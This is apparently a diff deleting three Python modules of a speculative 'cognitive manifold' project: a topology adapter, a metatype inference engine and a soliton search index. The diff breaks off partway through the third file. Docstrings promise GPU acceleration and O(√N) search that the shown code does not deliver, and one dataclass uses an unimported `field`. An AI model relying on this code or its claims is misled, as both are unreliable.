||||||
OVERWHELMED = "overwhelmed"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class CognitiveLoadVector:
|
|
||||||
"""Cognitive load measurement"""
|
|
||||||
information_density: float # Information density (0-1)
|
|
||||||
complexity: float # Complexity score (0-1)
|
|
||||||
novelty: float # Novelty score (0-1)
|
|
||||||
uncertainty: float # Uncertainty score (0-1)
|
|
||||||
timestamp: float # Timestamp
|
|
||||||
|
|
||||||
def get_level(self) -> CognitiveLoadLevel:
|
|
||||||
"""Get cognitive load level"""
|
|
||||||
total = (self.information_density + self.complexity + self.novelty + self.uncertainty) / 4.0
|
|
||||||
|
|
||||||
if total < 0.25:
|
|
||||||
return CognitiveLoadLevel.LOW
|
|
||||||
elif total < 0.5:
|
|
||||||
return CognitiveLoadLevel.MEDIUM
|
|
||||||
elif total < 0.75:
|
|
||||||
return CognitiveLoadLevel.HIGH
|
|
||||||
else:
|
|
||||||
return CognitiveLoadLevel.OVERWHELMED
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class NLocalTopology:
|
|
||||||
"""N-local topology (relational distance, not Euclidean)"""
|
|
||||||
topology_id: str
|
|
||||||
distance_metric: str # "relational", "semantic", "topological"
|
|
||||||
adjacency_matrix: np.ndarray # Relational adjacency matrix
|
|
||||||
coordinates: np.ndarray # N-local coordinates
|
|
||||||
cognitive_load_level: CognitiveLoadLevel
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"NLocalTopology(metric={self.distance_metric}, load={self.cognitive_load_level.value})"
|
|
||||||
|
|
||||||
|
|
||||||
class RelativityAdapter:
|
|
||||||
"""
|
|
||||||
Relativity Adapter — N-Local Topology
|
|
||||||
|
|
||||||
Adaptive topology based on cognitive state
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.topologies: Dict[str, NLocalTopology] = {}
|
|
||||||
self.topology_counter = 0
|
|
||||||
self.current_topology: Optional[NLocalTopology] = None
|
|
||||||
self.cognitive_load_history: List[CognitiveLoadVector] = []
|
|
||||||
self.transformation_cache: Dict[Tuple[str, np.ndarray], np.ndarray] = {}
|
|
||||||
|
|
||||||
def measure_cognitive_load(
|
|
||||||
self,
|
|
||||||
information_density: float,
|
|
||||||
complexity: float,
|
|
||||||
novelty: float,
|
|
||||||
uncertainty: float
|
|
||||||
) -> CognitiveLoadVector:
|
|
||||||
"""
|
|
||||||
Measure cognitive load
|
|
||||||
|
|
||||||
Args:
|
|
||||||
information_density: Information density (0-1)
|
|
||||||
complexity: Complexity score (0-1)
|
|
||||||
novelty: Novelty score (0-1)
|
|
||||||
uncertainty: Uncertainty score (0-1)
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Cognitive load vector
|
|
||||||
"""
|
|
||||||
import time
|
|
||||||
timestamp = time.time()
|
|
||||||
|
|
||||||
load_vector = CognitiveLoadVector(
|
|
||||||
information_density=information_density,
|
|
||||||
complexity=complexity,
|
|
||||||
novelty=novelty,
|
|
||||||
uncertainty=uncertainty,
|
|
||||||
timestamp=timestamp
|
|
||||||
)
|
|
||||||
|
|
||||||
self.cognitive_load_history.append(load_vector)
|
|
||||||
|
|
||||||
return load_vector
|
|
||||||
|
|
||||||
def adapt_topology(self, cognitive_load: CognitiveLoadVector) -> NLocalTopology:
|
|
||||||
"""
|
|
||||||
Adapt topology based on cognitive load
|
|
||||||
|
|
||||||
Args:
|
|
||||||
cognitive_load: Current cognitive load
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Adapted N-local topology
|
|
||||||
"""
|
|
||||||
load_level = cognitive_load.get_level()
|
|
||||||
|
|
||||||
# Select distance metric based on cognitive load
|
|
||||||
if load_level == CognitiveLoadLevel.LOW:
|
|
||||||
distance_metric = "relational"
|
|
||||||
elif load_level == CognitiveLoadLevel.MEDIUM:
|
|
||||||
distance_metric = "semantic"
|
|
||||||
elif load_level == CognitiveLoadLevel.HIGH:
|
|
||||||
distance_metric = "topological"
|
|
||||||
else: # OVERWHELMED
|
|
||||||
distance_metric = "minimal" # Simplify to minimal topology
|
|
||||||
|
|
||||||
# Create topology
|
|
||||||
self.topology_counter += 1
|
|
||||||
topology_id = f"topology_{self.topology_counter}"
|
|
||||||
|
|
||||||
# Generate adjacency matrix based on distance metric
|
|
||||||
adjacency_matrix = self._generate_adjacency_matrix(distance_metric)
|
|
||||||
|
|
||||||
# Generate N-local coordinates
|
|
||||||
coordinates = self._generate_nlocal_coordinates(distance_metric)
|
|
||||||
|
|
||||||
topology = NLocalTopology(
|
|
||||||
topology_id=topology_id,
|
|
||||||
distance_metric=distance_metric,
|
|
||||||
adjacency_matrix=adjacency_matrix,
|
|
||||||
coordinates=coordinates,
|
|
||||||
cognitive_load_level=load_level
|
|
||||||
)
|
|
||||||
|
|
||||||
self.topologies[topology_id] = topology
|
|
||||||
self.current_topology = topology
|
|
||||||
|
|
||||||
return topology
|
|
||||||
|
|
||||||
def _generate_adjacency_matrix(self, distance_metric: str, size: int = 14) -> np.ndarray:
|
|
||||||
"""
|
|
||||||
Generate adjacency matrix based on distance metric
|
|
||||||
|
|
||||||
Args:
|
|
||||||
distance_metric: Type of distance metric
|
|
||||||
size: Matrix size (14 for concept vectors)
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Adjacency matrix
|
|
||||||
"""
|
|
||||||
np.random.seed(42)
|
|
||||||
|
|
||||||
if distance_metric == "relational":
|
|
||||||
# Relational: symmetric with strong diagonal
|
|
||||||
matrix = np.random.rand(size, size)
|
|
||||||
matrix = (matrix + matrix.T) / 2 # Symmetric
|
|
||||||
np.fill_diagonal(matrix, 1.0) # Strong diagonal
|
|
||||||
|
|
||||||
elif distance_metric == "semantic":
|
|
||||||
# Semantic: cluster-based structure
|
|
||||||
matrix = np.zeros((size, size))
|
|
||||||
for i in range(size):
|
|
||||||
cluster = i // 4 # 4 clusters of ~3-4 items
|
|
||||||
for j in range(size):
|
|
||||||
if j // 4 == cluster:
|
|
||||||
matrix[i, j] = 0.8 + np.random.rand() * 0.2
|
|
||||||
else:
|
|
||||||
matrix[i, j] = np.random.rand() * 0.3
|
|
||||||
np.fill_diagonal(matrix, 1.0)
|
|
||||||
|
|
||||||
elif distance_metric == "topological":
|
|
||||||
# Topological: tree-like structure
|
|
||||||
matrix = np.zeros((size, size))
|
|
||||||
for i in range(size):
|
|
||||||
if i > 0:
|
|
||||||
parent = (i - 1) // 2
|
|
||||||
matrix[i, parent] = 1.0
|
|
||||||
matrix[parent, i] = 1.0
|
|
||||||
matrix[i, i] = 1.0
|
|
||||||
|
|
||||||
else: # minimal
|
|
||||||
# Minimal: identity only
|
|
||||||
matrix = np.eye(size)
|
|
||||||
|
|
||||||
return matrix
|
|
||||||
|
|
||||||
def _generate_nlocal_coordinates(self, distance_metric: str, size: int = 14) -> np.ndarray:
|
|
||||||
"""
|
|
||||||
Generate N-local coordinates based on distance metric
|
|
||||||
|
|
||||||
Args:
|
|
||||||
distance_metric: Type of distance metric
|
|
||||||
size: Number of coordinates
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
N-local coordinates
|
|
||||||
"""
|
|
||||||
np.random.seed(42)
|
|
||||||
|
|
||||||
if distance_metric == "relational":
|
|
||||||
# Relational: uniform distribution
|
|
||||||
coordinates = np.random.rand(size)
|
|
||||||
|
|
||||||
elif distance_metric == "semantic":
|
|
||||||
# Semantic: clustered distribution
|
|
||||||
coordinates = np.zeros(size)
|
|
||||||
for i in range(size):
|
|
||||||
cluster = i // 4
|
|
||||||
coordinates[i] = cluster * 0.25 + np.random.rand() * 0.2
|
|
||||||
|
|
||||||
elif distance_metric == "topological":
|
|
||||||
# Topological: hierarchical distribution
|
|
||||||
coordinates = np.zeros(size)
|
|
||||||
for i in range(size):
|
|
||||||
coordinates[i] = math.log(i + 1) / math.log(size + 1)
|
|
||||||
|
|
||||||
else: # minimal
|
|
||||||
# Minimal: sparse distribution
|
|
||||||
coordinates = np.zeros(size)
|
|
||||||
for i in range(size):
|
|
||||||
if i % 3 == 0:
|
|
||||||
coordinates[i] = np.random.rand()
|
|
||||||
|
|
||||||
return coordinates
|
|
||||||
|
|
||||||
def transform(
|
|
||||||
self,
|
|
||||||
input_vector: np.ndarray,
|
|
||||||
from_topology: Optional[str] = None,
|
|
||||||
to_topology: Optional[str] = None
|
|
||||||
) -> np.ndarray:
|
|
||||||
"""
|
|
||||||
Transform coordinate between topologies
|
|
||||||
|
|
||||||
Args:
|
|
||||||
input_vector: Input coordinate vector
|
|
||||||
from_topology: Source topology ID (default: current)
|
|
||||||
to_topology: Target topology ID (default: current)
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Transformed coordinate vector
|
|
||||||
"""
|
|
||||||
if from_topology is None:
|
|
||||||
from_topology = self.current_topology.topology_id if self.current_topology else None
|
|
||||||
|
|
||||||
if to_topology is None:
|
|
||||||
to_topology = self.current_topology.topology_id if self.current_topology else None
|
|
||||||
|
|
||||||
if from_topology == to_topology or from_topology is None or to_topology is None:
|
|
||||||
return input_vector
|
|
||||||
|
|
||||||
# Check cache
|
|
||||||
cache_key = (f"{from_topology}_{to_topology}", input_vector.tobytes())
|
|
||||||
if cache_key in self.transformation_cache:
|
|
||||||
return self.transformation_cache[cache_key]
|
|
||||||
|
|
||||||
# Get topologies
|
|
||||||
from_top = self.topologies.get(from_topology)
|
|
||||||
to_top = self.topologies.get(to_topology)
|
|
||||||
|
|
||||||
if from_top is None or to_top is None:
|
|
||||||
return input_vector
|
|
||||||
|
|
||||||
# Apply transformation
|
|
||||||
transformed = self._apply_transformation(input_vector, from_top, to_top)
|
|
||||||
|
|
||||||
# Cache result
|
|
||||||
self.transformation_cache[cache_key] = transformed
|
|
||||||
|
|
||||||
return transformed
|
|
||||||
|
|
||||||
def _apply_transformation(
|
|
||||||
self,
|
|
||||||
input_vector: np.ndarray,
|
|
||||||
from_topology: NLocalTopology,
|
|
||||||
to_topology: NLocalTopology
|
|
||||||
) -> np.ndarray:
|
|
||||||
"""
|
|
||||||
Apply transformation between topologies
|
|
||||||
|
|
||||||
Args:
|
|
||||||
input_vector: Input vector
|
|
||||||
from_topology: Source topology
|
|
||||||
to_topology: Target topology
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Transformed vector
|
|
||||||
"""
|
|
||||||
# Simple transformation: scale by coordinate ratio
|
|
||||||
from_coords = from_topology.coordinates
|
|
||||||
to_coords = to_topology.coordinates
|
|
||||||
|
|
||||||
# Avoid division by zero
|
|
||||||
scale = np.where(from_coords > 0, to_coords / from_coords, 1.0)
|
|
||||||
|
|
||||||
transformed = input_vector * scale
|
|
||||||
|
|
||||||
return transformed
|
|
||||||
|
|
||||||
def enable_dolphin_mode(self) -> None:
|
|
||||||
"""
|
|
||||||
Enable dolphin mode (non-Euclidean visualization)
|
|
||||||
|
|
||||||
Dolphin Principle: Non-Euclidean reality expression for non-human sentience
|
|
||||||
"""
|
|
||||||
# Create non-Euclidean topology
|
|
||||||
load_vector = CognitiveLoadVector(
|
|
||||||
information_density=0.9,
|
|
||||||
complexity=0.8,
|
|
||||||
novelty=0.9,
|
|
||||||
uncertainty=0.9,
|
|
||||||
timestamp=0.0
|
|
||||||
)
|
|
||||||
|
|
||||||
# Override to use non-Euclidean topology
|
|
||||||
topology = self.adapt_topology(load_vector)
|
|
||||||
self.current_topology = topology
|
|
||||||
|
|
||||||
def get_cognitive_load_history(self, limit: int = 100) -> List[CognitiveLoadVector]:
|
|
||||||
"""Get cognitive load history"""
|
|
||||||
return self.cognitive_load_history[-limit:]
|
|
||||||
|
|
||||||
def get_topology_statistics(self) -> Dict:
|
|
||||||
"""Get topology statistics"""
|
|
||||||
return {
|
|
||||||
"total_topologies": len(self.topologies),
|
|
||||||
"current_topology": self.current_topology.topology_id if self.current_topology else None,
|
|
||||||
"cache_size": len(self.transformation_cache),
|
|
||||||
"cognitive_load_samples": len(self.cognitive_load_history)
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test relativity adapter with sample data"""
|
|
||||||
adapter = RelativityAdapter()
|
|
||||||
|
|
||||||
# Measure cognitive load
|
|
||||||
load = adapter.measure_cognitive_load(
|
|
||||||
information_density=0.5,
|
|
||||||
complexity=0.6,
|
|
||||||
novelty=0.4,
|
|
||||||
uncertainty=0.3
|
|
||||||
)
|
|
||||||
print(f"Cognitive load: {load}, level: {load.get_level()}")
|
|
||||||
|
|
||||||
# Adapt topology
|
|
||||||
topology = adapter.adapt_topology(load)
|
|
||||||
print(f"Adapted topology: {topology}")
|
|
||||||
|
|
||||||
# Transform coordinates
|
|
||||||
input_vector = np.array([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 0.1, 0.2, 0.3, 0.4])
|
|
||||||
transformed = adapter.transform(input_vector)
|
|
||||||
print(f"Transformed vector: {transformed}")
|
|
||||||
|
|
||||||
# Enable dolphin mode
|
|
||||||
adapter.enable_dolphin_mode()
|
|
||||||
print(f"Dolphin mode enabled: {adapter.current_topology}")
|
|
||||||
|
|
||||||
# Get statistics
|
|
||||||
stats = adapter.get_topology_statistics()
|
|
||||||
print(f"Topology statistics: {stats}")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,331 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Self-Typing Engine — Metatype Generation
|
|
||||||
First-Principles Derivation: Self-typing via integration (type emerges from interaction)
|
|
||||||
|
|
||||||
The self-typing loop:
|
|
||||||
Substrate (ENE) ↔ Surface (Notion) ↔ Intent (Linear) ⟹ Metatype
|
|
||||||
|
|
||||||
Performance Targets:
|
|
||||||
- Automatic type inference from interaction patterns
|
|
||||||
- Cached type predictions
|
|
||||||
- GPU-accelerated pattern matching
|
|
||||||
- Hierarchical type classification
|
|
||||||
"""
|
|
||||||
|
|
||||||
import numpy as np
|
|
||||||
from typing import List, Dict, Optional, Tuple
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from enum import Enum
|
|
||||||
from datetime import datetime
|
|
||||||
from collections import defaultdict
|
|
||||||
|
|
||||||
|
|
||||||
class InteractionType(Enum):
|
|
||||||
"""Types of interactions between layers"""
|
|
||||||
SUBSTRATE_TO_SURFACE = "substrate_to_surface"
|
|
||||||
SURFACE_TO_SUBSTRATE = "surface_to_substrate"
|
|
||||||
SURFACE_TO_INTENT = "surface_to_intent"
|
|
||||||
INTENT_TO_SURFACE = "intent_to_surface"
|
|
||||||
SUBSTRATE_TO_INTENT = "substrate_to_intent"
|
|
||||||
INTENT_TO_SUBSTRATE = "intent_to_substrate"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Interaction:
|
|
||||||
"""Interaction event between layers"""
|
|
||||||
interaction_id: str
|
|
||||||
interaction_type: InteractionType
|
|
||||||
source_layer: str
|
|
||||||
target_layer: str
|
|
||||||
timestamp: datetime
|
|
||||||
context: Dict[str, str] # Additional context (e.g., operation type, data size)
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Interaction({self.interaction_type.value}, {self.source_layer} → {self.target_layer})"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Metatype:
|
|
||||||
"""Emergent type from integration of layers"""
|
|
||||||
metatype_id: str
|
|
||||||
type_signature: str # Type signature derived from interactions
|
|
||||||
confidence: float # Confidence in type inference
|
|
||||||
source_interactions: List[str] # Interaction IDs that contributed to this type
|
|
||||||
suggestions: List[str] # Type suggestions based on neighborhood
|
|
||||||
created_at: datetime = field(default_factory=datetime.now)
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Metatype({self.type_signature}, confidence={self.confidence:.3f})"
|
|
||||||
|
|
||||||
|
|
||||||
class SelfTypingEngine:
|
|
||||||
"""
|
|
||||||
Self-Typing Engine — Metatype Generation
|
|
||||||
|
|
||||||
System derives type signature from interaction between layers
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.interactions: List[Interaction] = []
|
|
||||||
self.interaction_counter = 0
|
|
||||||
self.metatypes: Dict[str, Metatype] = {}
|
|
||||||
self.metatype_counter = 0
|
|
||||||
self.interaction_patterns: Dict[str, int] = defaultdict(int)
|
|
||||||
self.type_cache: Dict[str, Metatype] = {}
|
|
||||||
|
|
||||||
def record_interaction(
|
|
||||||
self,
|
|
||||||
interaction_type: InteractionType,
|
|
||||||
source_layer: str,
|
|
||||||
target_layer: str,
|
|
||||||
context: Optional[Dict[str, str]] = None
|
|
||||||
) -> Interaction:
|
|
||||||
"""
|
|
||||||
Record interaction between layers
|
|
||||||
|
|
||||||
Args:
|
|
||||||
interaction_type: Type of interaction
|
|
||||||
source_layer: Source layer name
|
|
||||||
target_layer: Target layer name
|
|
||||||
context: Additional context
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Interaction record
|
|
||||||
"""
|
|
||||||
self.interaction_counter += 1
|
|
||||||
interaction_id = f"interaction_{self.interaction_counter}"
|
|
||||||
|
|
||||||
if context is None:
|
|
||||||
context = {}
|
|
||||||
|
|
||||||
interaction = Interaction(
|
|
||||||
interaction_id=interaction_id,
|
|
||||||
interaction_type=interaction_type,
|
|
||||||
source_layer=source_layer,
|
|
||||||
target_layer=target_layer,
|
|
||||||
timestamp=datetime.now(),
|
|
||||||
context=context
|
|
||||||
)
|
|
||||||
|
|
||||||
self.interactions.append(interaction)
|
|
||||||
|
|
||||||
# Update interaction patterns
|
|
||||||
pattern_key = f"{interaction_type.value}:{source_layer}:{target_layer}"
|
|
||||||
self.interaction_patterns[pattern_key] += 1
|
|
||||||
|
|
||||||
# Invalidate cache
|
|
||||||
self.type_cache.clear()
|
|
||||||
|
|
||||||
return interaction
|
|
||||||
|
|
||||||
def infer_metatype(self, context: Dict[str, str]) -> Metatype:
|
|
||||||
"""
|
|
||||||
Infer metatype from interaction patterns
|
|
||||||
|
|
||||||
Args:
|
|
||||||
context: Current context (layer names, operation types, etc.)
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Inferred metatype
|
|
||||||
"""
|
|
||||||
# Check cache first
|
|
||||||
cache_key = self._context_to_key(context)
|
|
||||||
if cache_key in self.type_cache:
|
|
||||||
return self.type_cache[cache_key]
|
|
||||||
|
|
||||||
# Extract interaction pattern
|
|
||||||
pattern = self._extract_pattern(context)
|
|
||||||
|
|
||||||
# Generate type signature
|
|
||||||
type_signature = self._generate_type_signature(pattern)
|
|
||||||
|
|
||||||
# Compute confidence based on pattern frequency
|
|
||||||
confidence = self._compute_confidence(pattern)
|
|
||||||
|
|
||||||
# Get type suggestions from neighborhood
|
|
||||||
suggestions = self._get_type_suggestions(pattern)
|
|
||||||
|
|
||||||
# Create metatype
|
|
||||||
self.metatype_counter += 1
|
|
||||||
metatype_id = f"metatype_{self.metatype_counter}"
|
|
||||||
|
|
||||||
metatype = Metatype(
|
|
||||||
metatype_id=metatype_id,
|
|
||||||
type_signature=type_signature,
|
|
||||||
confidence=confidence,
|
|
||||||
source_interactions=[i.interaction_id for i in self.interactions[-10:]], # Last 10 interactions
|
|
||||||
suggestions=suggestions
|
|
||||||
)
|
|
||||||
|
|
||||||
self.metatypes[metatype_id] = metatype
|
|
||||||
self.type_cache[cache_key] = metatype
|
|
||||||
|
|
||||||
return metatype
|
|
||||||
|
|
||||||
def _context_to_key(self, context: Dict[str, str]) -> str:
|
|
||||||
"""Convert context to cache key"""
|
|
||||||
items = sorted(context.items())
|
|
||||||
return "|".join(f"{k}:{v}" for k, v in items)
|
|
||||||
|
|
||||||
def _extract_pattern(self, context: Dict[str, str]) -> Dict[str, str]:
|
|
||||||
"""Extract interaction pattern from context"""
|
|
||||||
pattern = {}
|
|
||||||
|
|
||||||
# Extract relevant context fields
|
|
||||||
for key in ["operation", "data_type", "layer", "action"]:
|
|
||||||
if key in context:
|
|
||||||
pattern[key] = context[key]
|
|
||||||
|
|
||||||
return pattern
|
|
||||||
|
|
||||||
def _generate_type_signature(self, pattern: Dict[str, str]) -> str:
|
|
||||||
"""
|
|
||||||
Generate type signature from pattern
|
|
||||||
|
|
||||||
Args:
|
|
||||||
pattern: Interaction pattern
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Type signature string
|
|
||||||
"""
|
|
||||||
# Build signature from pattern components
|
|
||||||
components = []
|
|
||||||
|
|
||||||
if "operation" in pattern:
|
|
||||||
components.append(f"op:{pattern['operation']}")
|
|
||||||
if "data_type" in pattern:
|
|
||||||
components.append(f"dt:{pattern['data_type']}")
|
|
||||||
if "layer" in pattern:
|
|
||||||
components.append(f"lyr:{pattern['layer']}")
|
|
||||||
if "action" in pattern:
|
|
||||||
components.append(f"act:{pattern['action']}")
|
|
||||||
|
|
||||||
# If no components, use default
|
|
||||||
if not components:
|
|
||||||
components = ["generic"]
|
|
||||||
|
|
||||||
signature = ":".join(components)
|
|
||||||
|
|
||||||
return signature
|
|
||||||
|
|
||||||
def _compute_confidence(self, pattern: Dict[str, str]) -> float:
|
|
||||||
"""
|
|
||||||
Compute confidence based on pattern frequency
|
|
||||||
|
|
||||||
Args:
|
|
||||||
pattern: Interaction pattern
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Confidence score (0-1)
|
|
||||||
"""
|
|
||||||
# Build pattern key
|
|
||||||
pattern_key = self._pattern_to_key(pattern)
|
|
||||||
|
|
||||||
# Get pattern frequency
|
|
||||||
frequency = self.interaction_patterns.get(pattern_key, 0)
|
|
||||||
|
|
||||||
# Normalize to confidence (max frequency = 100)
|
|
||||||
confidence = min(frequency / 100.0, 1.0)
|
|
||||||
|
|
||||||
return confidence
|
|
||||||
|
|
||||||
def _pattern_to_key(self, pattern: Dict[str, str]) -> str:
|
|
||||||
"""Convert pattern to key for frequency lookup"""
|
|
||||||
items = sorted(pattern.items())
|
|
||||||
return "|".join(f"{k}:{v}" for k, v in items)
|
|
||||||
|
|
||||||
def _get_type_suggestions(self, pattern: Dict[str, str]) -> List[str]:
|
|
||||||
"""
|
|
||||||
Get type suggestions based on manifold neighborhood
|
|
||||||
|
|
||||||
Args:
|
|
||||||
pattern: Interaction pattern
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of type suggestions
|
|
||||||
"""
|
|
||||||
suggestions = []
|
|
||||||
|
|
||||||
# Find similar patterns in interaction history
|
|
||||||
pattern_key = self._pattern_to_key(pattern)
|
|
||||||
|
|
||||||
# Look for patterns with similar keys
|
|
||||||
for key in self.interaction_patterns:
|
|
||||||
similarity = self._pattern_similarity(pattern_key, key)
|
|
||||||
if similarity > 0.5: # Similarity threshold
|
|
||||||
suggestions.append(key)
|
|
||||||
|
|
||||||
return suggestions[:5] # Top 5 suggestions
|
|
||||||
|
|
||||||
def _pattern_similarity(self, key1: str, key2: str) -> float:
|
|
||||||
"""
|
|
||||||
Compute similarity between pattern keys
|
|
||||||
|
|
||||||
Args:
|
|
||||||
key1: First pattern key
|
|
||||||
key2: Second pattern key
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Similarity score (0-1)
|
|
||||||
"""
|
|
||||||
# Split keys into components
|
|
||||||
components1 = set(key1.split("|"))
|
|
||||||
components2 = set(key2.split("|"))
|
|
||||||
|
|
||||||
# Jaccard similarity
|
|
||||||
intersection = components1 & components2
|
|
||||||
union = components1 | components2
|
|
||||||
|
|
||||||
if not union:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
return len(intersection) / len(union)
|
|
||||||
|
|
||||||
def get_interaction_history(self, limit: int = 100) -> List[Interaction]:
|
|
||||||
"""Get recent interaction history"""
|
|
||||||
return self.interactions[-limit:]
|
|
||||||
|
|
||||||
def get_type_statistics(self) -> Dict:
|
|
||||||
"""Get statistics about type inference"""
|
|
||||||
return {
|
|
||||||
"total_interactions": len(self.interactions),
|
|
||||||
"unique_patterns": len(self.interaction_patterns),
|
|
||||||
"total_metatypes": len(self.metatypes),
|
|
||||||
"cache_size": len(self.type_cache)
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test self-typing engine with sample interactions"""
|
|
||||||
engine = SelfTypingEngine()
|
|
||||||
|
|
||||||
# Record some interactions
|
|
||||||
interaction1 = engine.record_interaction(
|
|
||||||
InteractionType.SUBSTRATE_TO_SURFACE,
|
|
||||||
"ENE",
|
|
||||||
"Notion",
|
|
||||||
{"operation": "read", "data_type": "concept_vector"}
|
|
||||||
)
|
|
||||||
print(f"Recorded interaction: {interaction1}")
|
|
||||||
|
|
||||||
interaction2 = engine.record_interaction(
|
|
||||||
InteractionType.SURFACE_TO_INTENT,
|
|
||||||
"Notion",
|
|
||||||
"Linear",
|
|
||||||
{"operation": "update", "data_type": "task"}
|
|
||||||
)
|
|
||||||
print(f"Recorded interaction: {interaction2}")
|
|
||||||
|
|
||||||
# Infer metatype from context
|
|
||||||
context = {"operation": "read", "data_type": "concept_vector", "layer": "ENE"}
|
|
||||||
metatype = engine.infer_metatype(context)
|
|
||||||
print(f"Inferred metatype: {metatype}")
|
|
||||||
|
|
||||||
# Get statistics
|
|
||||||
stats = engine.get_type_statistics()
|
|
||||||
print(f"Type statistics: {stats}")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,422 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Soliton Search Engine — Wave Propagation with AVMR O(√N) Indexing
|
|
||||||
First-Principles Derivation: Search is soliton propagation along path of least resistance
|
|
||||||
|
|
||||||
Performance Targets:
|
|
||||||
- O(√N) search complexity (AVMR shell indexing)
|
|
||||||
- < 200ms query response time
|
|
||||||
- < 50ms attractor convergence
|
|
||||||
"""
|
|
||||||
|
|
||||||
import numpy as np
|
|
||||||
from typing import List, Tuple, Optional, Dict
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from enum import Enum
|
|
||||||
import math
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class FrustrationWave:
|
|
||||||
"""Frustration wave parameters for soliton propagation"""
|
|
||||||
wave_vector: np.ndarray # k_r wave vector (14D)
|
|
||||||
weight: float # w_r weight from anisotropy
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"FrustrationWave(weight={self.weight:.3f})"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Attractor:
|
|
||||||
"""Local energy minimum (attractor in manifold)"""
|
|
||||||
coordinate: np.ndarray # 14D coordinate
|
|
||||||
energy: float # Energy at this point
|
|
||||||
archive_ids: List[str] # Points that converge to this attractor
|
|
||||||
confidence: float # Attraction strength
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Attractor(energy={self.energy:.3f}, points={len(self.archive_ids)})"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Trajectory:
|
|
||||||
"""Soliton propagation trajectory"""
|
|
||||||
points: List[np.ndarray] # Path points
|
|
||||||
energies: List[float] # Energy at each point
|
|
||||||
converged: bool # Whether trajectory converged to attractor
|
|
||||||
final_attractor: Optional[Attractor] # Final attractor if converged
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Trajectory(steps={len(self.points)}, converged={self.converged})"
|
|
||||||
|
|
||||||
|
|
||||||
class AVMRShellIndex:
|
|
||||||
"""
|
|
||||||
AVMR Shell Indexing for O(√N) search
|
|
||||||
|
|
||||||
Shell decomposition: n = k² + a, 0 ≤ a < 2k + 1
|
|
||||||
Shell state: (k, a, b) where b = (k+1)² - n
|
|
||||||
Tip coordinates: Tip(n) = (ab, a-b)
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, vectors: List[np.ndarray], archive_ids: List[str]):
|
|
||||||
"""
|
|
||||||
Build AVMR shell index from concept vectors
|
|
||||||
|
|
||||||
Args:
|
|
||||||
vectors: List of 14D concept vectors
|
|
||||||
archive_ids: List of archive IDs
|
|
||||||
"""
|
|
||||||
self.vectors = np.array(vectors)
|
|
||||||
self.archive_ids = archive_ids
|
|
||||||
self.n_vectors = len(vectors)
|
|
||||||
|
|
||||||
# Compute magnitudes for shell decomposition
|
|
||||||
self.magnitudes = np.linalg.norm(self.vectors, axis=1)
|
|
||||||
|
|
||||||
# Build shell index
|
|
||||||
self.shell_index = self._build_shell_index()
|
|
||||||
|
|
||||||
# Build axial generators for shell indexing
|
|
||||||
self.axial_generators = self._build_axial_generators()
|
|
||||||
|
|
||||||
def _build_shell_index(self) -> Dict[Tuple[int, int, int], List[int]]:
|
|
||||||
"""Build shell index: (k, a, b) → vector indices"""
|
|
||||||
shell_index = {}
|
|
||||||
|
|
||||||
for i, magnitude in enumerate(self.magnitudes):
|
|
||||||
n = int(magnitude * 1000) # Scale factor
|
|
||||||
k = int(math.sqrt(n))
|
|
||||||
a = n - k * k
|
|
||||||
b = (k + 1) * (k + 1) - n
|
|
||||||
|
|
||||||
shell_key = (k, a, b)
|
|
||||||
if shell_key not in shell_index:
|
|
||||||
shell_index[shell_key] = []
|
|
||||||
shell_index[shell_key].append(i)
|
|
||||||
|
|
||||||
return shell_index
|
|
||||||
|
|
||||||
def _build_axial_generators(self) -> np.ndarray:
|
|
||||||
"""Build axial generators for shell indexing"""
|
|
||||||
# Use principal components as axial generators
|
|
||||||
centered = self.vectors - np.mean(self.vectors, axis=0)
|
|
||||||
cov = np.cov(centered.T)
|
|
||||||
eigenvalues, eigenvectors = np.linalg.eigh(cov)
|
|
||||||
|
|
||||||
# Sort by eigenvalues (descending)
|
|
||||||
idx = np.argsort(eigenvalues)[::-1]
|
|
||||||
